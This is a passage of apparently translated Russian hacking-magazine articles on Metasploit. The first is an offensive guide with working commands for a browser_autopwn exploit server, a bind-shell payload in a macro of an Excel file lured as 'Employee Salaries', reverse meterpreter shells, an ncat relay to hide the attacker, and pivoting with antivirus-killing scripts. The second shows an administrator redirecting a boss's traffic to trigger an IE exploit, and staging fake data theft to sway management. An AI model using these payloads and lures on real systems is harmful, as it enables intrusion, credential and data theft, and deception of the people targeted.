If the previous exploit was designed for standard exploits, then this one is designed for client exploits aimed at victims’ browsers, as the name suggests.
In fact, this module raises the HTTP server and on it raises all the exploits for browsers. When a victim visits our server, the module detects the browser version and OS, and then launches the appropriate exploit. So far, the main feature of the module is the accurate determination of the browser/OS version. Both server and client detection capabilities (JavaScript) are used. That is, it will definitely not be possible to deceive the module by substituting another User-Agent.

Of the available exploits, old-school versions of browsers work well, but the best part is that you can simply add your own exploits, and this is already powerful. It turns out to be a free spoilpack.

In future versions, they promise to add capabilities for obfuscation of exploits (so that antivirus software does not burn them) and capabilities for selecting loads.

For example, let's create a server with backconnect for shells 192.168.0.102:

msf> use server/browser_autopwn
msf> set LHOST 192.168.0.102
msf> set URI index.php
msf> exploit -j

VBA

In the EasyHack section I already wrote about creating Trojans using MSF, but sending exe files is very bad. Users these days have become timid and don’t open everything they can get their hands on, and there are also warnings from Windows. It’s much less painful to use some office files:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Next, we create, for example, an Excel document with the terrible name “Employee Salaries.” Then we open the resulting VBA, shove the macro text (MACRO CODE) into the document macro (Tools -> Macro -> VB Editor), and at the end of the document - our “load” (PAYLOAD DATA). You can add some calculations for beauty to the beginning of the document. Since macros are disabled by default (from the OfficeXP version, as far as I know), then a line like “Attention! Working with the database is possible only when macros are enabled. To enable them, go to “Tools –> Options –> Security –> Macro Protection –> Low” and restart the document”, you can force the user to enable macros. As a result, the shell is on port 5555.

Semantic load

In fact, the choice of payload for exploits is an important matter. But there are a lot of them in MSF, so I'll go through them a little (mostly on Win*) to get a general understanding. Firstly, there is a general division by OS, as well as software and loadable interpreters (ruby, perl).

General division by description:

• Those marked “Inline” are “whole” shellcodes. They are large, so they don’t always fit into exploits;
• "Stager" - loads divided into parts. The exploit contains a small shellcode, mainly for establishing a connection, the rest is loaded upon connection;
• “Ord” – “sharpened” loads. Small in size, but tied to static addresses in the memory of the system DLL;
• “Bind” – open a port and wait for a connection;
• “Reverse” – backconnect shell;
• “Findport” – a search is made for the socket through which the exploit worked, then the shell opens through it. The search is carried out by port number;
• “Findtag” - similar to the previous one, only the socket is determined by listening to all available ones in anticipation of the arrival of a 4-byte tag from the hacker.;
• “Exec, Download_exec, Up_exec” – shellcode to launch the command, download/download and launch;
• “VNC” – launch the victim’s VNC server;
• “dllinjection” – loading DLLs into process memory. There are two types of DLL injection;
• “metsvc” – downloads the entire meterpreter to the victim and registers it as a service;
• “PassiveX” – our shell acts as an ActiveX element.
• “NoNX” – shellcodes that bypass the DEP memory protection mechanism;
• “DNS” – those that can work by host names, rather than by IP;
• “HTTPS” is a shell that communicates using the encrypted HTTPS protocol (sorry, no proxy support).

I'll focus a little on PassiveX, since they are very good.
The bottom line is that our shell is registered as an ActiveX element, and interaction occurs through a hidden version of IE using the HTTP protocol. This is actually cool, especially if you break some kind of corporate network, where everyone sits behind NAT and with a common firewall that only allows HTTP traffic from the corporate proxy server. In this case, no other load will help, especially if you don’t know the proxy settings. And here - all the settings for the proxy and authentication on it (if it exists) are already registered in IE.

Let's create a load and a wiretap for it (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Moreover, if before PassiveX only worked under IE6, now everything is fine with IE7/8.

Next, about ordinary shells. A regular shell is, of course, good, but if you used meterpreter, then you will want to return to it.
And now we have this opportunity. Let's assume our victim (192.168.0.101) already has a regular bind shell installed on port 5678.

Let's connect to it from MSF:

msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

I would like to say that with the next command we turn an ordinary shell into a meterpreter, but no luck. MSF simply loads the meterpreter backconnect and, having launched it, creates another session (another connection is created). Although that's not bad either. But for everything to work, we need to set the global values ​​of our host (where the reverse connects), and then “update” the session (let’s assume it’s “1”):

msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions –u 1

As a result, we get rid of a lot of stress and limitations of a regular shell.

By the way, about meterpreter. They have been trying to transfer it to other platforms (linux, Macos) for a long time, but so far not everything is going smoothly. But still, there is good news: meterpreter has been ported to PHP in some form! In “some kind”, because not all functions can be implemented by PHP, but the main ones are already available. So you can upload it to your overloaded server and play around with such a cool shell.

Now let's talk about our own “safety”. Currently, most MSF modules do not support proxies, especially for combat workloads. After all, we don’t want to be found out :). Therefore, let’s remember the old-school feature - portforwarding.

Let’s assume our server with MSF, waiting for shells to backconnect, is located at “192.168.0.103:5555”. Then we install netcat on a fake server on port 80:

ncat --sh-exec “ncat 192.168.0.103 5555” –l 80 --keep-open

And in payloads we register the IP (or DNS) and port of the fake server.
By the way, netcat supports SSL, so you can encrypt traffic if the shell itself does not allow this.

Post-exploitation

Yes, now let’s move on to the most delicious part – post-exploitation and meterpreter. I hope you are familiar with meterpreter, because I can’t tell you how good it is (and leaves almost no traces behind itself, and works in chroot) and functional (built-in hack tools, modification of the registry and file system, migration across processes and tokens, routing) I have no desire :).

Let's assume that we have gained access to one of the computers (192.168.146.129) on the corporate network and we (192.168.0.102) want to build on our success - scan the subnet and do something else.

Add a route (subgrid, its mask, session for routing) in msfconsol:

msf> route add 192.168.146.0 255.255.255.0 1

Unfortunately, nmap did not want to use this route - apparently, the integration is not so deep yet. But ordinary modules, exploits and scanners can be used calmly (that is, without any special settings) to develop an attack (see figure) - MSF takes care of all the routing.

Since certain hosts may have limited access to the external network (where we are located), then to communicate with them you can use portforwarding on an already made victim, fortunately, meterpreter can do this:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

Now we write in the payloads of the exploits LHOST=192.168.146.129, LPORT=8008, and everything will be great.

Meterpreter has a wonderful feature - automating actions through Ruby scripts. This is really cool. You can view existing scripts in msf3\scripts\meterpreter; while using it, write run and Tab twice (for those who are not in the know:). You can run scripts either manually via the run command, or by specifying the AutoRunScript or InitialAutoRunScript variable when configuring the load/server. The second variable is executed before the shell is launched, the first – after.

There are already a lot of scripts included in the package, from the most standard:

• winenum – quickly collects all information about the system from network settings to installed software and hashes;
• persistence, metsvc – registers meterpreter to autostart in the registry or as a service;
• getcountermeasure – disables fire, can kill processes of various antiviruses and firewalls.

Instead of a conclusion

In the article I tried to describe something new (at least for Russian-language sources) and at the same time about all stages of hacking, so I hope it will be useful to you. In addition, a couple of brilliant ideas were born that just needed to be implemented, and there were a couple of nasty bugs in MFS, which, I hope, will be eliminated by the release of the issue. In general, creating is wonderful!

A few tips:

• Autocompletion works great in msfconsol by pressing Tab, and all commands support help with the “-h” parameter.
• If you want to pause the execution of a command – Ctrl+C, send it to the background – Ctrl+Z.
• Copying text in Cygwin is done using the left/right mouse button, pasting is Shift+Insert.
• Under Windows, access to the msfcli, msfpayload, etc. interfaces. done via the cygwin console. But it is advisable to test it thoroughly, since not all functions may work adequately.

PAVEL TROITSKY

Vulnerability Research Using the Metasploit Framework

It's never too late to learn, and teaching others is a pleasant experience... From this article you can learn how simply and clearly you can demonstrate the operation of most vulnerabilities using the Metasploit Framework.

Everything that happens in life is for the better... One Saturday morning I had to work bravely. Agree, it’s not the most pleasant activity, especially on your day off. But the situation can be looked at from the other side.

After a few hours of morning work, when I was freed up and in a state of sleep on the move, I no longer felt the urge to go home. I floated down the corridor, where there was a soothing silence compared to the noisy everyday life. I don’t remember how curiosity probably kicked in; hearing from afar the characteristic incessant sounds of quickly pressing keys on a keyboard, I changed course on autopilot and moored in the next department.

I love watching people working with passion. It turned out that my namesake and colleague was sitting behind his two monitors and deciding something. I landed softly in one of the empty chairs, turned on the kettle and waited.

Pashok came back to life and noticed me only when the kettle boiled and loudly clicked its thermal switch throughout the room. Apparently, the fact that he didn’t put the kettle on worked.

Seeing me, he quickly made himself some coffee, sat back down in his seat, and was clearly delighted that he could pour out his soul to me during a tea party and find understanding. And so it turned out. He was solving one interesting problem that his boss had assigned him, with microcontrollers, while also thinking about another task for which he did not have enough time.

The second task was more interesting than the first, I will try to describe it to you, and then offer the solution we came up with.

Is closed source the enemy of the people?

It is no secret that the technical department and its management look askance at those who use closed-source programs, which also contain many vulnerabilities. When the company's management understands the problem, that's good. The technical department is given the green light, and the entire organization switches to solutions that are more correct and safe for the company.

But there are other cases when management, relying on the opinions of friends and acquaintances, pretends to understand, but in fact it does not.

For example, not everyone appreciates the advantages of new versions of Linux, OpenOffice or the Mozilla Firefox browser (compared to their closed and not always stable counterparts: Windows, MSOffice or IE).

People are inert, accustomed to something and don’t want to change anything. The fish rots from the head - there are cases when management does not allow the technical department to access their computers (especially laptops), being not only a source of security violations, but also the first target for the machinations of competitors.

The goal of the task was to restore authority to the technical department, give an introductory lecture for staff and implement decisions on installation and transition to more secure Open Source analogues, citing this not by one’s own desire, but by the order of the management above the technical department.

The task seems clear, if you have many years of experience, you were probably able to see in it something intersecting from your life or similar. Let's look at the case of a decision where cunning benefits the common cause. If you have more interesting solutions, write to the magazine’s forum and we’ll discuss it!

Solution

How to proceed? Since almost everyone uses the Global Network, and it poses a significant threat to any department, we will set a goal - to wean users from using IE.

If we turn to the classics, there are not many different approaches to solving problems:

• if you check the browser you are using and disable IE access to the network on the proxy server, then this will not be the best solution, and the administrator can be classified as a “maniac”;
• if you delete IE for all users, then it will be an “idiot” administrator, and the problem will also not be solved;
• if you try to harm users running IE, it will be a “fascist” administrator - he will not achieve success either, since he will spend all his energy fighting the investigation.

The most correct thing is to use a trick and fight the cause. Imagine, if all users consciously refuse some solution, then what would be the point in the business world for a manufacturer to promote this solution?

The most suitable type of administrator for our idea is the “technical bandit”.

We will study the various nuances of how browsers work and the vulnerabilities that exist in them, install special programs that demonstrate hidden capabilities that arise due to errors, and thereby force management to make the right decision.

Check your system for vulnerabilities

It is an obvious fact that any large program has errors. Almost everyone understands this, including management. Therefore, various scanners have long been invented to check networks and individual hosts. But not everyone understands the specifics of their work.

If Nessus, Shadow Security Scanner, nmap, XSpider and others are to some extent convenient and have proven themselves well, then you should rely on their results with an understanding of what is happening.

For example, what about the case when the execution of some code (containing a vulnerability) occurs on the user’s side, and is not initiated by an external scanner? It is no secret that many people, having scanned their computer (or server) and not finding open ports and vulnerable services, mistakenly think that their systems are in perfect order.

We will try to prove this error using the example of the IE browser using the Metasploit Framework program.

Action plan. A little theory

When you receive various mailings on security issues or visit websites on similar topics, you periodically come across information about various vulnerabilities. Such and such a vulnerability allows you to transfer some code to the client and execute it on its side; such and such a vulnerability simply terminates the application.

In theory, it works like this: you go to the XXX site, and instead a terminal window opens, where you run the “format with:” command.

The example is exaggerated, but if you find it hard to believe, by the end of the article you will be able to conduct a similar experiment in your own home.

The Metasploit Project

This is a project created by Metasploit LLC, containing useful information for people involved in developing databases for attack detection systems (ASAs), as well as researching vulnerabilities and how they work.

The purpose of the resource is to collect various information about known exploits and vulnerabilities along with the codes that implement them, so that this information is available to security administrators and developers.

The site contains several sections containing useful information.

We will need a Framework section (see Figure 1), dedicated to the platform on which our plan can be implemented.

Look for Download below and download framework-3.2.tar.gz.

Installing the Metasploit Framework

Previously, the program was only available through the CLI (command line interface), and therefore was known only in narrow circles.

GUI (graphical interface) support has recently been added, making the program more attractive to less experienced users (especially the availability of a Windows version of the program). Whether this is good or bad is difficult to say. We will choose a version for Linux and a GUI interface.

The operating system is the recently released Fedora 10. Of course, it is not without problems. Most likely, in six months to a year, minor problems will be resolved, and it will become a working platform for many administrators, but for now it is very suitable for our experiments. If we take earlier versions (Fedora 8, 9), then there should be no fundamental differences in the installation.

For the graphical interface to work, you must install the Ruby language and libraries:

• ruby-1.8.6.287-2.fc10.i386.rpm;
• ruby-libs-1.8.6.287-2.fc10.i386.rpm;
• ruby-gtk2-0.18.0-2.fc10.i386.rpm;
• ruby-libglade2-0.18.0-2.fc10.i386.rpm;
• ruby-atk-0.18.0-2.fc10.i386.rpm;
• ruby-cairo-1.8.0-1.fc10.i386.rpm;
• ruby-gdkpixbuf2-0.18.0-2.fc10.i386.rpm;
• ruby-glib2-0.18.0-2.fc10.i386.rpm;
• ruby-gnome2-0.18.0-2.fc10.i386.rpm;
• ruby-gnomecanvas2-0.18.0-2.fc10.i386.rpm;
• ruby-libart2-0.18.0-2.fc10.i386.rpm;
• ruby-pango-0.18.0-2.fc10.i386.rpm.

This can be done either manually using the commands:

rpm -ihv *.rpm

or via:

yum install...

then it is enough to specify only the first four packages; all the rest will be defined as dependent and installed themselves.

The next step is to unpack the downloaded framework-3.2.tar.gz archive into a directory, go into it and run the msfgui file with administrator rights.

Administrator rights (root) are needed so that the program can open sockets for listening on any port (for example, 80, TCP protocol).

Starting the program

Now, choosing vulnerabilities (there are many of them in the Metasploit Framework database), we can try to implement a server that will generate code that will be transferred to the client for execution on its side. And then we will check the client for vulnerability. The first one at hand was chosen as the vulnerable machine, namely with Windows 2003 and IE 6.0 (see Fig. 5). By the way, some administrators, without bothering themselves, often search for something on the Internet on questions that interest them directly from the server console, while they are not going to install alternative browsers, citing the fact that such Internet access is “on the knee of the server room” they are rare. Let me note that it only takes one case to compromise a server!

And then the situation is simple: the main task is to lure the victim or the all-knowing boss to our computer. On the Internet, this is solved socially, that is, in a roundabout way. For example, by placing various banners or redirecting via popup windows from already infected sites. This often happens on dubious sites (free downloads of commercial programs, porn sites, etc.) that invite you to click on a banner.

On a local network, being its administrators, we can close the request on the gateway where we need it, and then show the boss that any completely harmless site can work wonders with his computer (run other applications, copy his documents, etc.), provided that it may even have an antivirus running.

Of course, all this variety of actions depends on your imagination, and the purpose of the article is only to show the direction and what is possible. Therefore, we will limit ourselves to just one vulnerability as an example and will launch some harmless program on the victim’s computer, for example “Calculator”. It’s no secret that in order to write this article, so as not to deceive anyone, I had to sort through vulnerabilities for half an hour to find one that worked in this configuration.

The vulnerability described in Microsoft Security Bulletin MS06-067 was selected - select this vulnerability in the program database (see Fig. 6).

We specify port 8081 and a command to run on a machine with a vulnerable browser “c:\windows\system32\calc.exe” (see Fig. 8).

Note: if you want to register port 80, and you are running an httpd server, then do not forget to stop it, for example, with the command:

# service httpd stop

or:

# /etc/rc.d/init.d/httpd stop

Otherwise, it is not clear which of the two programs should listen on the port for incoming connections. For this purpose, the example uses port 8081, which will obviously be free.

After we confirm the settings (see Fig. 9) and in the list of hanging jobs (jobs) we have a new task (see Fig. 10).

Window of the victim's car (see Figure 11).

Conclusion

Of course, this example is trivial, and in order to impress others or your boss, it is better to modify it, taking into account the specifics. We are designed in such a way that any action (change) attracts us more, so for people who do not really understand how buffer overflow occurs, it is better to run an archiver with keys instead of a calculator so that there is animation in the window, for example, the number of compressed percentages “runs” files from the “My Documents\Confidential” folder. Then it will be easier to say that this site is aimed at collecting information from your boss’s computer and your arguments will be more powerful. Since the site launched an archiver, and not some kind of calculator, then the problem is much more serious. Although I hope that most readers, reading these lines, will smile once again.

This article and example can also be used for educational purposes. Why not a guide for teachers in safety courses or in universities on conducting demonstrations or laboratory work? It will be much more interesting for students to carry out such laboratory work than to calculate results that are not always clear.

If you're wondering if it's time for you to update/change your system or browser, then you're on the right track!

1. Robachevsky A. M. UNIX operating system. – St. Petersburg: BHV-Petersburg, 2002, ISBN 5-8206-0030-4.
2. The website of The Metasploit Project, which contains information and exploits on various vulnerabilities, is http://metasploit.com.
3. Microsoft Security Bulletin Vulnerability MS06-067 – http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx.

In contact with